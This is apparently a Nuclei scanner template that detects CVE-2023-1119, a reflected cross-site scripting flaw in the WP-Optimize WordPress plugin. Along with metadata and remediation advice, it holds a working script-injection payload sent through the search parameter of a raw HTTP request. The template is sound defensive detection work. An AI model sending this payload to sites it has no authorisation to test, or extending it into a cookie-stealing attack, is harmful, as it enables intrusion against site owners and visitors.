id: CVE-2023-1119

info:
  name: WP-Optimize WordPress plugin < 3.2.13 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The WP-Optimize WordPress plugin before 3.2.13 and SrbTransLatin WordPress plugin before 2.4.1 are vulnerable to cross-site scripting due to a third-party library that improperly handles HTML character escaping.
  remediation: Users are recommended to upgrade WP-Optimize to version 3.2.13 and SrbTransLatin to version 2.4.1 to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/1119
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1119
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1119
    cwe-id: CWE-79
    cpe: cpe:2.3:a:wp-optimize:wp-optimize:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wordpress
    product: wp-optimize,srbtranslatin
    fofa-query: body="/wp-content/plugins/wp-optimize"
  tags: cve,cve2023,wp,wp-plugin,wordpress,wp-optimize,xss

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/wp-optimize"
        internal: true

  - raw:
      - |
        GET /?s=<%2Fscript><script>alert%28document.domain%29<%2Fscript> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"
          - "Search"
        condition: and

      - type: word
        part: body
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008232a765d67baa00d08b0479d2c9ee98696d78e1a4c976c3aff9ad6be32496b20221009702f2f33fcad48642cf87ab73a24f8ea063242b5a1ea0d41fd437f63a2f58af:922c64590222798bb761d5b6d8e72950